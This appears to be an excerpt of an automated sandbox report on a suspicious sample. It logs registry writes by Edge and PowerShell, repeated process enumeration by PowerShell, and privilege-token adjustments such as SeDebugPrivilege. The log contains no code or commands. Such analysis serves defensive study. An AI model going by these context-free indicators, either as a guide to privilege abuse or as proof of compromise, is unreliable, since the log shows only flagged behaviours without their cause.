Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = eb839459fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2a59ea59fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 901e8d74fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 578f425afdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f0fbf56cfdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "423462179" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
